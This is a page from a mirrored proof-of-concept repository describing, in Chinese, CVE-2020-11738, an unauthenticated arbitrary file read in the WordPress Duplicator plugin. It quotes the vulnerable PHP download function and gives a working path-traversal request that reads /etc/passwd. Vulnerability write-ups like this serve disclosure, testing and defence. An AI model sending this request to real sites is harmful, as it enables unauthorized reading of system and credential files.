admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

77 lines
2.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
## 漏洞描述
WordPress Duplicator插件由于对文件下载没有进行验证则导致了任意文件读取漏洞
## 漏洞影响
```
Duplicator <= v1.3.26
```
## 插件名
Duplicator
https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip
## 漏洞复现
首先先查看注册的无需授权的action接口 `wp-content/plugins/duplicator/ctrls/class.web.services.php`
![](images/202205241332267.png)
这里 `wp_ajax_nopriv_duplicator_download` 对应的函数名为 duplicator_download
![](images/202205241332007.png)
```
public static function duplicator_download() {
$file = sanitize_text_field($_GET['file']);
$filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
// Process download
if(file_exists($filepath)) {
// Clean output buffer
if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
@ob_clean();
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
flush(); // Flush system output buffer
try {
$fp = @fopen($filepath, 'r');
if (false === $fp) {
throw new Exception('Fail to open the file '.$filepath);
}
while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
echo $data;
}
@fclose($fp);
} catch (Exception $e) {
readfile($filepath);
}
exit;
} else {
wp_die('Invalid installer file name!!');
}
}
```
可以看到这里接受参数 file拼接至 $filepath 中,通过调试可以得知
DUPLICATOR_SSDIR_PATH 为 wp-snapshots 目录file可控且没有过滤导致任意文件读取
```
/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd
```
![](images/202205241334750.png)
Reference in New Issue View Git Blame Copy Permalink